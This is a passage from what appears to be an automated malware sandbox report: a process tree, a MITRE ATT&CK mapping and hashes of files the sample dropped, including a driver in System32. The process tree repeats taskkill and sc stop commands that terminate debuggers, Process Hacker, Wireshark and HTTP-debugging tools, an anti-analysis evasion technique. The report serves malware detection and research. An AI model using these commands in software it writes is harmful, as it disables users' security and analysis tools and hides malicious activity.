                                                                                                                                        PID:4432
                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                          taskkill /f /im Ida64.exe
                                                                                                                                          3⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:2500
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
                                                                                                                                        2⤵
                                                                                                                                          PID:2192
                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                            taskkill /f /im OllyDbg.exe
                                                                                                                                            3⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:1808
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
                                                                                                                                          2⤵
                                                                                                                                            PID:1936
                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                              taskkill /f /im Dbg64.exe
                                                                                                                                              3⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:400
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
                                                                                                                                            2⤵
                                                                                                                                              PID:2280
                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                taskkill /f /im Dbg32.exe
                                                                                                                                                3⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:1016
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                                              2⤵
                                                                                                                                                PID:3944
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  sc stop HTTPDebuggerPro
                                                                                                                                                  3⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:1336
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                                                                2⤵
                                                                                                                                                  PID:3776
                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                                                                    3⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:508
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5040
                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                                                                      3⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:1924
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3840
                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                        taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                                                        3⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:4744
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2508
                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                          taskkill /f /im HTTPDebuggerUI.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:4736
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3304
                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                            taskkill /f /im HTTPDebuggerSvc.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:4184
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4196
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              sc stop HTTPDebuggerPro
                                                                                                                                                              3⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:3480
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2560
                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                                                                                3⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:2188
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2340
                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                  taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:2300
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1860
                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:2472
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2584
                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                      taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:4444
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1700
                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                        taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:1036
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4920
                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                          taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:4628
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2044
                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                            taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:4512
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3832
                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                              taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:4032
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4424
                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                PID:2780
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1968
                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                  taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:1720
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4356
                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    PID:4804
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:636
                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:4888
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2504
                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                        taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:4756
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2272
                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                          sc stop HTTPDebuggerPro
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:4728
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1260
                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                            sc stop HTTPDebuggerProSdk
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                            PID:2184
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3208
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              sc stop KProcessHacker3
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:3212
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3104
                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                sc stop KProcessHacker2
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                PID:508
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3284
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  sc stop KProcessHacker1
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:3568
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:3960
                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                    sc stop wireshark
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:3596
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3968
                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                      taskkill /f /im HTTPDebuggerUI.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:3868
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4204
                                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                        taskkill /f /im HTTPDebuggerSvc.exe
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:4144
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:220
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          sc stop HTTPDebuggerPro
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:4184
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:3304
                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                            taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:3480
                                                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:3700
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          sc stop KProcessHacker2
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:3844

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1060

                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1031

                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1497

                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1112

                                                                                                                                                                                                        Impair Defenses

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1562

                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1012

                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1497

                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                        4
                                                                                                                                                                                                        T1082

                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1102

                                                                                                                                                                                                        Impact

                                                                                                                                                                                                        Service Stop

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1489

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\7ce4e421-89d3-4b0f-992c-634d984d857d.tmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          9KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          178c4b7d632c0322d3b18e4e52d64ae1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6d2544e43ca01a8c48a5997b1a6737b31dce3e61

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          3f48e122bec1e0258255842040d7bb721e8fcda35c5132ac30635c119fdbedf7

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          9fc244d10423d5cb8651fc1bdbff9f381e773538cb612fc4275bc140561e6f83bc9d0c1cc881f047182ef191add43e4de6fbc3b972518ac0b5bb388bfec72d9f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          152B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          aaeb1f5e097ab38083674077b84b8ed6

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          7d9191cb2277c30f1147c9d29d75fc8e6aa0a4f2

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          1654b27bfaeee49bfe56e0c4c0303418f4887f3ea1933f03cafce10352321aef

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          130f1b62134626959f69b13e33c42c3182e343d7f0a5b6291f7bb0c2f64b60885f5e6331e1866a4944e9b7b2e49fe798e073316fde23927ede2c348ba0e56eda

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          152B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1db53baf44edd6b1bc2b7576e2f01e12

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e35739fa87978775dcb3d8df5c8d2063631fa8df

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0d73ba3eea4c552ce3ffa767e4cd5fff4e459e543756987ab5d55f1e6d963f48

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          84f544858803ac14bac962d2df1dbc7ed6e1134ecf16d242d7ee7316648b56b5bc095241363837bf0bf0afd16ca7deebe7afb7d40057604acbf09821fd5a9912

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          96B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a31a3d7e95406116d0c901379c5b3fd2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          d19bfa1d20f21b17c8c939496b719b74e3ed2566

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          60662141bd3e33485ef33823a0f5c8a899ee6d63d287406bf46c4c2b4eae629d

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          cc887c9d828c03ee2159a857a51aa441fd71bef5f41065ceea3ea3ae60e990a2ed47a2896e79b318816971d5e499e3ca8c5939827e7d6c3683e6102a473ca63f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe56b144.TMP
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          48B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          7eee1d38e8ebe5415dfcf4121651498d

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a01a1b0ca44051bb6e756772baa54a5ac9db1dbc

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          53833b3b9bf5ab0481ba00a9dc442867fa0963b07a1f26cadb9f39bab0423f1c

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          784cc9c226d8ec0ec0d3db58cc92bcdfaf6220200808b9f82e870c46842ff8c25c084371266da5adc9eb056c2a8c2e4a4b3784a90d894acc6f117b632be464a3

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          dfd8b7301f7d23fbab36aad11edd2bd7

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          911d1108f827f920cdd4e0fec2f79ed38741f2df

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          454d7255879d8ca37608cfc69da273fcf5aeff1d7353d876593cc09c7e1d63b7

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5ff4bf02033d756b698a575d4e3151ee4190937425372cdff850ebbdb25caecf31363d1437163a28511e921dbccfea6acb2626bcd60251f6619019b273d02d1d

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          459B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          3930851a131786f30a3c9ffabef596ec

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          eb883b1b572443e394f1b2a4d4fa47b98bd9db16

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9abcc78b49e690215938143aed178114fb802b1e3785fef0dec82c41a1c549de

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          351e2621f331d7475ec4cb238e84be528053599f8836c88b951c3fd10d2c5fae9dafa522df750370b55c3041941cf13044f01b14b6820c75213fb6df62db5dc5

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          7d02adbedbc03f501f28328bbe7ca22f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          bd19b3620dc15179223de73dac5b8b56f8dffa21

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9e158c7cc04f1c1e06ba140a7502433ad01fc7641d2f423daae759869e5622b0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          854a2dcc5d250b46241114f3223da498fe41ebfde00465c92921a6ec4a13832ee31ff6212c01b6c4bc31a09c0001903394c479fc8e235c57fbaa5d20d6b0cdfe

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          6KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ffd0d01a3350d12e39ea6c948443a99f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          077aed267583be375cf8fb1132e7ca550c6c5f96

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9881645a448b591f42b95af1f7ca7980e6e93a5c260a6293385a6ee2f55dd930

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          1ceb15ddeb2455d24db6b6cb89a57c23f7a58e9634e722a7601658c4909655484e3334228a652ab3e48707721f5e6a62166293857ed5ae36700bd733fc4eba03

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          24KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          47e94a96372e6f095b8a3fd7edc48ec0

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          377b68f34e5964ca8be1b1b0c1507dd7f0e5f005

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          15c77bafd922bd085317fd544d0fa129e3b8c814e3ba0d48936366004427732e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5bd63de2e831805b723d7ddf1343c3b721ef5b757d9ab01bf8554ef8e29ac2cc09fa104fc85d530f27d66b67280774b3ebbef6729ea3ab61ce8028ab4ba5bdad

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          16B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          46295cac801e5d4857d09837238a6394

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          41B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b8215842-4ec1-4323-adb7-6044146003b8.tmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          70KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          e5e3377341056643b0494b6842c0b544

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          264KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                                                        • C:\Windows\System32\NeptnDriver.sys
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          9KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a1367ef701a8b404b03e7437fe67309c

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e0134d68196f23ef0b48e088e556cf74bb06d173

